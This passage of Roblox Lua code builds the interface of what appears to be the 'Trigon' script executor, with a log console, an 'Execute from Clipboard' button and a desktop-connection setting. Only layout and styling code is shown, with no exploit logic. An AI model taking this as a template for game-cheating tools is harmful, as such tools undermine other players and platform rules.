trii.RightFrame.Position = UDim2.new(0.887643, 0, 0, 0) trii.RightFrame.BackgroundTransparency = 1 trii.RightFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.RightFrame.Name = "RightFrame" trii.RightFrame.BackgroundColor3 = Color3.fromRGB(47, 52, 65) trii.RightFrame.Parent = trii.BottomMenuFrame trii.Button.Active = false trii.Button.BorderSizePixel = 0 trii.Button.ScaleType = Enum.ScaleType.Fit trii.Button.AutoButtonColor = false trii.Button.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Button.Selectable = false trii.Button.AnchorPoint = Vector2.new(0.5, 0.5) trii.Button.Size = UDim2.new(0.834246, 0, 0.8, 0) trii.Button.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Button.Name = "Button" trii.Button.BackgroundTransparency = 1 trii.Button.Position = UDim2.new(0.490288, 0, 0.5, 0) trii.Button.Parent = trii.RightFrame trii.UIGradient.Color = ColorSequence.new{ ColorSequenceKeypoint.new(0, Color3.fromRGB(57, 64, 84)), ColorSequenceKeypoint.new(1, Color3.fromRGB(75, 82, 107)) } trii.UIGradient.Rotation = -90 trii.UIGradient.Parent = trii.Button trii.Icon_1.SizeConstraint = Enum.SizeConstraint.RelativeYY trii.Icon_1.BorderSizePixel = 0 trii.Icon_1.ScaleType = Enum.ScaleType.Fit trii.Icon_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Icon_1.AnchorPoint = Vector2.new(0.5, 0.5) trii.Icon_1.Image = "rbxassetid://15844306310" trii.Icon_1.Size = UDim2.new(0.83136, 0, 0.783259, 0) trii.Icon_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Icon_1.Name = "Icon" trii.Icon_1.BackgroundTransparency = 1 trii.Icon_1.Position = UDim2.new(0.370799, 0, 0.475195, 0) trii.Icon_1.Parent = trii.Button trii.MenuList.BorderSizePixel = 0 trii.MenuList.Size = UDim2.new(0.777778, 0, 1, 0) trii.MenuList.Position = UDim2.new(0.116366, 0, 0, 0) trii.MenuList.BackgroundTransparency = 1 trii.MenuList.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.MenuList.Name = "MenuList" trii.MenuList.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.MenuList.Parent = trii.BottomMenuFrame trii.UICorner_1.CornerRadius = UDim.new(0.15, 0) trii.UICorner_1.Parent = trii.MenuList trii.UIGridLayout.CellPadding = UDim2.new(0.02, 0, 1, 0) trii.UIGridLayout.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIGridLayout.SortOrder = Enum.SortOrder.LayoutOrder trii.UIGridLayout.CellSize = UDim2.new(0.12, 0, 0.8, 0) trii.UIGridLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center trii.UIGridLayout.Parent = trii.MenuList trii.HBtn.BorderSizePixel = 3 trii.HBtn.ScaleType = Enum.ScaleType.Fit trii.HBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.HBtn.BorderMode = Enum.BorderMode.Inset trii.HBtn.Selectable = false trii.HBtn.AnchorPoint = Vector2.new(0.5, 0.5) trii.HBtn.Size = UDim2.new(0.12, 0, 0.8, 0) trii.HBtn.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.HBtn.Name = "HBtn" trii.HBtn.Position = UDim2.new(0.406853, 0, 0.5, 0) trii.HBtn.Parent = trii.MenuList trii.UIGradient_1.Color = ColorSequence.new{ ColorSequenceKeypoint.new(0, Color3.fromRGB(57, 64, 84)), ColorSequenceKeypoint.new(1, Color3.fromRGB(75, 82, 107)) } trii.UIGradient_1.Rotation = -90 trii.UIGradient_1.Parent = trii.HBtn trii.Icon_2.ImageColor3 = Color3.fromRGB(201, 205, 210) trii.Icon_2.SizeConstraint = Enum.SizeConstraint.RelativeXX trii.Icon_2.BorderSizePixel = 0 trii.Icon_2.ScaleType = Enum.ScaleType.Fit trii.Icon_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Icon_2.AnchorPoint = Vector2.new(0.5, 0.5) trii.Icon_2.Image = "rbxassetid://15982534656" trii.Icon_2.Size = UDim2.new(0.858703, 0, 0.887424, 0) trii.Icon_2.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Icon_2.Name = "Icon" trii.Icon_2.BackgroundTransparency = 1 trii.Icon_2.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Icon_2.Parent = trii.HBtn trii.UIStroke.Thickness = 2 trii.UIStroke.Color = Color3.fromRGB(121, 133, 167) trii.UIStroke.Parent = trii.HBtn trii.UICorner_2.CornerRadius = UDim.new(0.14, 0) trii.UICorner_2.Parent = trii.HBtn trii.ExecBtn.BorderSizePixel = 3 trii.ExecBtn.ScaleType = Enum.ScaleType.Fit trii.ExecBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.ExecBtn.BorderMode = Enum.BorderMode.Inset trii.ExecBtn.AnchorPoint = Vector2.new(0.5, 0.5) trii.ExecBtn.Size = UDim2.new(0.12, 0, 0.8, 0) trii.ExecBtn.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.ExecBtn.Name = "ExecBtn" trii.ExecBtn.Position = UDim2.new(0.406853, 0, 0.5, 0) trii.ExecBtn.Parent = trii.MenuList trii.Icon_3.ImageColor3 = Color3.fromRGB(201, 205, 210) trii.Icon_3.SizeConstraint = Enum.SizeConstraint.RelativeXX trii.Icon_3.BorderSizePixel = 0 trii.Icon_3.ScaleType = Enum.ScaleType.Fit trii.Icon_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Icon_3.AnchorPoint = Vector2.new(0.5, 0.5) trii.Icon_3.Image = "rbxassetid://15845222401" trii.Icon_3.Size = UDim2.new(0.858703, 0, 0.887424, 0) trii.Icon_3.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Icon_3.Name = "Icon" trii.Icon_3.BackgroundTransparency = 1 trii.Icon_3.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Icon_3.Parent = trii.ExecBtn trii.UIStroke_1.Thickness = 2 trii.UIStroke_1.Color = Color3.fromRGB(121, 133, 167) trii.UIStroke_1.Parent = trii.ExecBtn trii.UICorner_3.CornerRadius = UDim.new(0.14, 0) trii.UICorner_3.Parent = trii.ExecBtn trii.UIGradient_2.Color = ColorSequence.new{ ColorSequenceKeypoint.new(0, Color3.fromRGB(57, 64, 84)), ColorSequenceKeypoint.new(1, Color3.fromRGB(75, 82, 107)) } trii.UIGradient_2.Rotation = -90 trii.UIGradient_2.Parent = trii.ExecBtn trii.CloudBtn.BorderSizePixel = 3 trii.CloudBtn.ScaleType = Enum.ScaleType.Fit trii.CloudBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.CloudBtn.BorderMode = Enum.BorderMode.Inset trii.CloudBtn.Selectable = false trii.CloudBtn.AnchorPoint = Vector2.new(0.5, 0.5) trii.CloudBtn.Size = UDim2.new(0.12, 0, 0.8, 0) trii.CloudBtn.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.CloudBtn.Name = "CloudBtn" trii.CloudBtn.Position = UDim2.new(0.406853, 0, 0.5, 0) trii.CloudBtn.Parent = trii.MenuList trii.UIGradient_3.Color = ColorSequence.new{ ColorSequenceKeypoint.new(0, Color3.fromRGB(57, 64, 84)), ColorSequenceKeypoint.new(1, Color3.fromRGB(75, 82, 107)) } trii.UIGradient_3.Rotation = -90 trii.UIGradient_3.Parent = trii.CloudBtn trii.Icon_4.ImageColor3 = Color3.fromRGB(201, 205, 210) trii.Icon_4.SizeConstraint = Enum.SizeConstraint.RelativeXX trii.Icon_4.BorderSizePixel = 0 trii.Icon_4.ScaleType = Enum.ScaleType.Fit trii.Icon_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Icon_4.AnchorPoint = Vector2.new(0.5, 0.5) trii.Icon_4.Image = "rbxassetid://15982538173" trii.Icon_4.Size = UDim2.new(0.858703, 0, 0.887424, 0) trii.Icon_4.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Icon_4.Name = "Icon" trii.Icon_4.BackgroundTransparency = 1 trii.Icon_4.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Icon_4.Parent = trii.CloudBtn trii.UIStroke_2.Thickness = 2 trii.UIStroke_2.Color = Color3.fromRGB(121, 133, 167) trii.UIStroke_2.Parent = trii.CloudBtn trii.UICorner_4.CornerRadius = UDim.new(0.14, 0) trii.UICorner_4.Parent = trii.CloudBtn trii.SettingsBtn.BorderSizePixel = 3 trii.SettingsBtn.ScaleType = Enum.ScaleType.Fit trii.SettingsBtn.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.SettingsBtn.BorderMode = Enum.BorderMode.Inset trii.SettingsBtn.Selectable = false trii.SettingsBtn.AnchorPoint = Vector2.new(0.5, 0.5) trii.SettingsBtn.Size = UDim2.new(0.12, 0, 0.8, 0) trii.SettingsBtn.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.SettingsBtn.Name = "SettingsBtn" trii.SettingsBtn.Position = UDim2.new(0.406853, 0, 0.5, 0) trii.SettingsBtn.Parent = trii.MenuList trii.UIGradient_4.Color = ColorSequence.new{ ColorSequenceKeypoint.new(0, Color3.fromRGB(57, 64, 84)), ColorSequenceKeypoint.new(1, Color3.fromRGB(75, 82, 107)) } trii.UIGradient_4.Rotation = -90 trii.UIGradient_4.Parent = trii.SettingsBtn trii.Icon_5.ImageColor3 = Color3.fromRGB(201, 205, 210) trii.Icon_5.SizeConstraint = Enum.SizeConstraint.RelativeXX trii.Icon_5.BorderSizePixel = 0 trii.Icon_5.ScaleType = Enum.ScaleType.Fit trii.Icon_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Icon_5.AnchorPoint = Vector2.new(0.5, 0.5) trii.Icon_5.Image = "rbxassetid://15845262087" trii.Icon_5.Size = UDim2.new(0.858703, 0, 0.887424, 0) trii.Icon_5.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Icon_5.Name = "Icon" trii.Icon_5.BackgroundTransparency = 1 trii.Icon_5.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Icon_5.Parent = trii.SettingsBtn trii.UIStroke_3.Thickness = 2 trii.UIStroke_3.Color = Color3.fromRGB(121, 133, 167) trii.UIStroke_3.Parent = trii.SettingsBtn trii.UICorner_5.CornerRadius = UDim.new(0.14, 0) trii.UICorner_5.Parent = trii.SettingsBtn trii.UICorner_6.CornerRadius = UDim.new(0.08, 0) trii.UICorner_6.Parent = trii.BottomMenuFrame trii.logFrame.Active = true trii.logFrame.BorderSizePixel = 0 trii.logFrame.Size = UDim2.new(0.95, 0, 0.649, 0) trii.logFrame.Position = UDim2.new(0.024, 0, 0.09, 0) trii.logFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.logFrame.Visible = false trii.logFrame.Name = "logFrame" trii.logFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.logFrame.Parent = trii.MainFrame trii.UICorner_7.CornerRadius = UDim.new(0.02, 0) trii.UICorner_7.Parent = trii.logFrame trii.logButtons.BorderSizePixel = 0 trii.logButtons.Size = UDim2.new(0.964723, 0, 0.120071, 0) trii.logButtons.Position = UDim2.new(0.0291137, 0, 0.878761, 0) trii.logButtons.BackgroundTransparency = 1 trii.logButtons.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.logButtons.Name = "logButtons" trii.logButtons.BackgroundColor3 = Color3.fromRGB(255, 0, 0) trii.logButtons.Parent = trii.logFrame trii.logOutput.BorderSizePixel = 0 trii.logOutput.Size = UDim2.new(0.110762, 0, 1, 0) trii.logOutput.BackgroundTransparency = 1 trii.logOutput.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.logOutput.ClipsDescendants = true trii.logOutput.Name = "logOutput" trii.logOutput.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.logOutput.Parent = trii.logButtons trii.Button_1.ZIndex = 2 trii.Button_1.ScaleType = Enum.ScaleType.Fit trii.Button_1.Image = "rbxassetid://3926311105" trii.Button_1.ImageRectSize = Vector2.new(48, 48) trii.Button_1.Size = UDim2.new(0.23, 0, 1, 0) trii.Button_1.Name = "Button" trii.Button_1.LayoutOrder = 7 trii.Button_1.BackgroundTransparency = 1 trii.Button_1.Position = UDim2.new(0, 0, 5.09924e-07, 0) trii.Button_1.ImageRectOffset = Vector2.new(4, 836) trii.Button_1.Parent = trii.logOutput trii.TextLabel.TextWrapped = true trii.TextLabel.BorderSizePixel = 0 trii.TextLabel.TextScaled = true trii.TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.TextLabel.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextLabel.TextSize = 14 trii.TextLabel.Size = UDim2.new(0.728848, 0, 0.568112, 0) trii.TextLabel.TextColor3 = Color3.fromRGB(225, 225, 225) trii.TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextLabel.Text = "Log Output" trii.TextLabel.Position = UDim2.new(0.26, 0, 0.215944, 0) trii.TextLabel.BackgroundTransparency = 1 trii.TextLabel.TextXAlignment = Enum.TextXAlignment.Left trii.TextLabel.Parent = trii.logOutput trii.UIListLayout.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout.Padding = UDim.new(0.03, 0) trii.UIListLayout.ItemLineAlignment = Enum.ItemLineAlignment.Center trii.UIListLayout.Parent = trii.logOutput trii.UIListLayout_1.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_1.HorizontalAlignment = Enum.HorizontalAlignment.Right trii.UIListLayout_1.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout_1.SortOrder = Enum.SortOrder.LayoutOrder trii.UIListLayout_1.Padding = UDim.new(0.005, 0) trii.UIListLayout_1.Parent = trii.logButtons trii.logWarning.BorderSizePixel = 0 trii.logWarning.Size = UDim2.new(0.133679, 0, 1, 0) trii.logWarning.Position = UDim2.new(0.125762, 0, 0, 0) trii.logWarning.BackgroundTransparency = 1 trii.logWarning.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.logWarning.ClipsDescendants = true trii.logWarning.Name = "logWarning" trii.logWarning.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.logWarning.Parent = trii.logButtons trii.Button_2.ZIndex = 2 trii.Button_2.ScaleType = Enum.ScaleType.Fit trii.Button_2.Image = "rbxassetid://3926311105" trii.Button_2.ImageRectSize = Vector2.new(48, 48) trii.Button_2.Size = UDim2.new(0.206312, 0, 1, 0) trii.Button_2.Name = "Button" trii.Button_2.LayoutOrder = 7 trii.Button_2.BackgroundTransparency = 1 trii.Button_2.Position = UDim2.new(0, 0, 5.09924e-07, 0) trii.Button_2.ImageRectOffset = Vector2.new(4, 836) trii.Button_2.Parent = trii.logWarning trii.TextLabel_1.TextWrapped = true trii.TextLabel_1.BorderSizePixel = 0 trii.TextLabel_1.TextScaled = true trii.TextLabel_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.TextLabel_1.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextLabel_1.TextSize = 14 trii.TextLabel_1.Size = UDim2.new(0.74, 0, 0.568112, 0) trii.TextLabel_1.TextColor3 = Color3.fromRGB(225, 225, 225) trii.TextLabel_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextLabel_1.Text = "Log Warning " trii.TextLabel_1.Position = UDim2.new(0.26, 0, 0.215944, 0) trii.TextLabel_1.BackgroundTransparency = 1 trii.TextLabel_1.TextXAlignment = Enum.TextXAlignment.Left trii.TextLabel_1.Parent = trii.logWarning trii.UIListLayout_2.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_2.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout_2.Padding = UDim.new(0.03, 0) trii.UIListLayout_2.ItemLineAlignment = Enum.ItemLineAlignment.Center trii.UIListLayout_2.Parent = trii.logWarning trii.logError.BorderSizePixel = 0 trii.logError.Size = UDim2.new(0.110762, 0, 1, 0) trii.logError.BackgroundTransparency = 1 trii.logError.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.logError.ClipsDescendants = true trii.logError.Name = "logError" trii.logError.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.logError.Parent = trii.logButtons trii.Button_3.ZIndex = 2 trii.Button_3.ScaleType = Enum.ScaleType.Fit trii.Button_3.Image = "rbxassetid://3926311105" trii.Button_3.ImageRectSize = Vector2.new(48, 48) trii.Button_3.Size = UDim2.new(0.23, 0, 1, 0) trii.Button_3.Name = "Button" trii.Button_3.LayoutOrder = 7 trii.Button_3.BackgroundTransparency = 1 trii.Button_3.Position = UDim2.new(0, 0, 5.09924e-07, 0) trii.Button_3.ImageRectOffset = Vector2.new(4, 836) trii.Button_3.Parent = trii.logError trii.TextLabel_2.TextWrapped = true trii.TextLabel_2.BorderSizePixel = 0 trii.TextLabel_2.TextScaled = true trii.TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.TextLabel_2.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextLabel_2.TextSize = 14 trii.TextLabel_2.Size = UDim2.new(0.728848, 0, 0.41773, 0) trii.TextLabel_2.TextColor3 = Color3.fromRGB(225, 225, 225) trii.TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextLabel_2.Text = "Log Error" trii.TextLabel_2.Position = UDim2.new(0.26, 0, 0.366327, 0) trii.TextLabel_2.BackgroundTransparency = 1 trii.TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left trii.TextLabel_2.Parent = trii.logError trii.UIListLayout_3.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_3.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout_3.Padding = UDim.new(0.03, 0) trii.UIListLayout_3.ItemLineAlignment = Enum.ItemLineAlignment.Center trii.UIListLayout_3.Parent = trii.logError trii.logInfo.BorderSizePixel = 0 trii.logInfo.Size = UDim2.new(0.139335, 0, 1, 0) trii.logInfo.Position = UDim2.new(0.414065, 0, 0, 0) trii.logInfo.BackgroundTransparency = 1 trii.logInfo.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.logInfo.ClipsDescendants = true trii.logInfo.Name = "logInfo" trii.logInfo.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.logInfo.Parent = trii.logButtons trii.Button_4.ZIndex = 2 trii.Button_4.ScaleType = Enum.ScaleType.Fit trii.Button_4.Image = "rbxassetid://3926305904" trii.Button_4.ImageRectSize = Vector2.new(36, 36) trii.Button_4.Size = UDim2.new(0.184161, 0, 1, 0) trii.Button_4.Name = "Button" trii.Button_4.LayoutOrder = 7 trii.Button_4.BackgroundTransparency = 1 trii.Button_4.Position = UDim2.new(0, 0, 5.09924e-07, 0) trii.Button_4.ImageRectOffset = Vector2.new(724, 724) trii.Button_4.Parent = trii.logInfo trii.TextLabel_3.TextWrapped = true trii.TextLabel_3.BorderSizePixel = 0 trii.TextLabel_3.TextScaled = true trii.TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.TextLabel_3.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextLabel_3.TextSize = 14 trii.TextLabel_3.Size = UDim2.new(0.728848, 0, 0.384311, 0) trii.TextLabel_3.TextColor3 = Color3.fromRGB(225, 225, 225) trii.TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextLabel_3.Text = "Enable Logging" trii.TextLabel_3.Position = UDim2.new(0.26, 0, 0.399745, 0) trii.TextLabel_3.BackgroundTransparency = 1 trii.TextLabel_3.TextXAlignment = Enum.TextXAlignment.Left trii.TextLabel_3.Parent = trii.logInfo trii.UIListLayout_4.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_4.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout_4.Padding = UDim.new(0.03, 0) trii.UIListLayout_4.ItemLineAlignment = Enum.ItemLineAlignment.Center trii.UIListLayout_4.Parent = trii.logInfo trii.cclrbtn.BorderSizePixel = 3 trii.cclrbtn.ScaleType = Enum.ScaleType.Fit trii.cclrbtn.AutoButtonColor = false trii.cclrbtn.BackgroundColor3 = Color3.fromRGB(44, 48, 61) trii.cclrbtn.BorderMode = Enum.BorderMode.Inset trii.cclrbtn.Selectable = false trii.cclrbtn.AnchorPoint = Vector2.new(0.5, 0.5) trii.cclrbtn.Size = UDim2.new(0.108402, 0, 0.784056, 0) trii.cclrbtn.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.cclrbtn.Name = "cclrbtn" trii.cclrbtn.Position = UDim2.new(0.580167, 0, 0.5, 0) trii.cclrbtn.Parent = trii.logButtons trii.Title.TextWrapped = true trii.Title.BorderSizePixel = 0 trii.Title.TextScaled = true trii.Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title.AnchorPoint = Vector2.new(0.5, 0.5) trii.Title.TextSize = 14 trii.Title.Name = "Title" trii.Title.Size = UDim2.new(0.582424, 0, 0.612447, 0) trii.Title.TextColor3 = Color3.fromRGB(250, 250, 250) trii.Title.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title.Text = "Clear Logs" trii.Title.Position = UDim2.new(0.494866, 0, 0.493859, 0) trii.Title.BackgroundTransparency = 1 trii.Title.Parent = trii.cclrbtn trii.UICorner_8.CornerRadius = UDim.new(0.08, 0) trii.UICorner_8.Parent = trii.cclrbtn trii.UIStroke_4.LineJoinMode = Enum.LineJoinMode.Miter trii.UIStroke_4.Thickness = 3 trii.UIStroke_4.Color = Color3.fromRGB(60, 66, 83) trii.UIStroke_4.Enabled = false trii.UIStroke_4.Parent = trii.cclrbtn trii.excp.BorderSizePixel = 3 trii.excp.ScaleType = Enum.ScaleType.Fit trii.excp.AutoButtonColor = false trii.excp.BackgroundColor3 = Color3.fromRGB(44, 48, 61) trii.excp.BorderMode = Enum.BorderMode.Inset trii.excp.Selectable = false trii.excp.AnchorPoint = Vector2.new(0.5, 0.5) trii.excp.Size = UDim2.new(0.0945025, 0, 0.784056, 0) trii.excp.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.excp.Name = "excp" trii.excp.Position = UDim2.new(0.711627, 0, 0.616964, 0) trii.excp.Parent = trii.logButtons trii.Title_1.TextWrapped = true trii.Title_1.BorderSizePixel = 0 trii.Title_1.TextScaled = true trii.Title_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_1.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_1.AnchorPoint = Vector2.new(0.5, 0.5) trii.Title_1.TextSize = 14 trii.Title_1.Name = "Title" trii.Title_1.Size = UDim2.new(0.712748, 0, 0.866139, 0) trii.Title_1.TextColor3 = Color3.fromRGB(250, 250, 250) trii.Title_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_1.Text = "Execute from Clipboard" trii.Title_1.Position = UDim2.new(0.495013, 0, 0.497096, 0) trii.Title_1.BackgroundTransparency = 1 trii.Title_1.Parent = trii.excp trii.UICorner_9.CornerRadius = UDim.new(0.08, 0) trii.UICorner_9.Parent = trii.excp trii.UIStroke_5.LineJoinMode = Enum.LineJoinMode.Miter trii.UIStroke_5.Thickness = 3 trii.UIStroke_5.Color = Color3.fromRGB(60, 66, 83) trii.UIStroke_5.Enabled = false trii.UIStroke_5.Parent = trii.excp trii.TextLabel_4.TextWrapped = true trii.TextLabel_4.BorderSizePixel = 0 trii.TextLabel_4.TextScaled = true trii.TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.TextLabel_4.FontFace = Font.new("rbxasset://fonts/families/Inconsolata.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextLabel_4.TextSize = 14 trii.TextLabel_4.Size = UDim2.new(0.242269, 0, 0.492921, 0) trii.TextLabel_4.TextColor3 = Color3.fromRGB(225, 225, 225) trii.TextLabel_4.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextLabel_4.Text = "Note: There is like 280 line limit on roblox :/" trii.TextLabel_4.Position = UDim2.new(0.81694, 0, 0.253539, 0) trii.TextLabel_4.BackgroundTransparency = 1 trii.TextLabel_4.TextXAlignment = Enum.TextXAlignment.Left trii.TextLabel_4.Parent = trii.logButtons trii.consoleFrame.BorderSizePixel = 0 trii.consoleFrame.CanvasSize = UDim2.new(0, 0, 0.87, 0) trii.consoleFrame.CanvasPosition = Vector2.new(0, 7.944) trii.consoleFrame.BackgroundColor3 = Color3.fromRGB(255, 0, 0) trii.consoleFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y trii.consoleFrame.Size = UDim2.new(0.975214, 0, 0.853, 0) trii.consoleFrame.BackgroundTransparency = 1 trii.consoleFrame.Active = true trii.consoleFrame.ScrollBarImageTransparency = 0.8 trii.consoleFrame.ScrollBarThickness = 10 trii.consoleFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.consoleFrame.Name = "consoleFrame" trii.consoleFrame.Position = UDim2.new(0.0167858, 0, 0.0257617, 0) trii.consoleFrame.Parent = trii.logFrame trii.GlobalLog.Name = "GlobalLog" trii.GlobalLog.Parent = trii.consoleFrame trii.TextBox.BorderSizePixel = 0 trii.TextBox.RichText = true trii.TextBox.TextYAlignment = Enum.TextYAlignment.Top trii.TextBox.BackgroundColor3 = Color3.fromRGB(39, 53, 255) trii.TextBox.FontFace = Font.new("rbxasset://fonts/families/SourceSansPro.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextBox.TextStrokeColor3 = Color3.fromRGB(211, 211, 211) trii.TextBox.TextSize = 26 trii.TextBox.Name = "TextBox" trii.TextBox.AutomaticSize = Enum.AutomaticSize.Y trii.TextBox.Size = UDim2.new(1, 0, 1, 0) trii.TextBox.TextColor3 = Color3.fromRGB(211, 211, 211) trii.TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextBox.Text = "" trii.TextBox.LineHeight = 1.3 trii.TextBox.BackgroundTransparency = 1 trii.TextBox.TextXAlignment = Enum.TextXAlignment.Left trii.TextBox.Parent = trii.consoleFrame trii.SettingsFrame.Active = true trii.SettingsFrame.BorderSizePixel = 0 trii.SettingsFrame.Size = UDim2.new(0.95, 0, 0.649, 0) trii.SettingsFrame.Position = UDim2.new(0.024, 0, 0.09, 0) trii.SettingsFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.SettingsFrame.Visible = false trii.SettingsFrame.Name = "SettingsFrame" trii.SettingsFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.SettingsFrame.Parent = trii.MainFrame trii.UICorner_10.CornerRadius = UDim.new(0.02, 0) trii.UICorner_10.Parent = trii.SettingsFrame trii.sample.BorderSizePixel = 0 trii.sample.Size = UDim2.new(0.939366, 0, 0.171716, 0) trii.sample.Position = UDim2.new(0.0299999, 0, 0.0520692, 0) trii.sample.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.sample.Name = "sample" trii.sample.BackgroundColor3 = Color3.fromRGB(30, 34, 42) trii.sample.Parent = trii.SettingsFrame trii.UIListLayout_5.HorizontalAlignment = Enum.HorizontalAlignment.Right trii.UIListLayout_5.SortOrder = Enum.SortOrder.LayoutOrder trii.UIListLayout_5.Padding = UDim.new(0.1, 0) trii.UIListLayout_5.Parent = trii.sample trii.UICorner_11.CornerRadius = UDim.new(0.1, 0) trii.UICorner_11.Parent = trii.sample trii.Title_2.TextWrapped = true trii.Title_2.BorderSizePixel = 0 trii.Title_2.TextScaled = true trii.Title_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_2.FontFace = Font.new("rbxasset://fonts/families/Inconsolata.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_2.AnchorPoint = Vector2.new(0.5, 0.5) trii.Title_2.TextSize = 100 trii.Title_2.Name = "Title" trii.Title_2.Size = UDim2.new(0.895877, 0, 0, 0) trii.Title_2.TextColor3 = Color3.fromRGB(250, 250, 250) trii.Title_2.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_2.Text = "" trii.Title_2.Position = UDim2.new(0.552062, 0, 0, 0) trii.Title_2.BackgroundTransparency = 1 trii.Title_2.TextXAlignment = Enum.TextXAlignment.Left trii.Title_2.Parent = trii.sample trii.Title_3.TextWrapped = true trii.Title_3.BorderSizePixel = 0 trii.Title_3.TextScaled = true trii.Title_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_3.FontFace = Font.new("rbxasset://fonts/families/Inconsolata.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_3.AnchorPoint = Vector2.new(0.5, 0.5) trii.Title_3.TextSize = 100 trii.Title_3.Name = "Title" trii.Title_3.Size = UDim2.new(0.909815, 0, 0.349235, 0) trii.Title_3.TextColor3 = Color3.fromRGB(250, 250, 250) trii.Title_3.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_3.Text = "Enable Trigon Desktop Connection" trii.Title_3.Position = UDim2.new(0.545092, 0, 0.274617, 0) trii.Title_3.BackgroundTransparency = 1 trii.Title_3.TextXAlignment = Enum.TextXAlignment.Left trii.Title_3.Parent = trii.sample trii.Title_4.TextWrapped = true trii.Title_4.BorderSizePixel = 0 trii.Title_4.TextScaled = true trii.Title_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_4.FontFace = 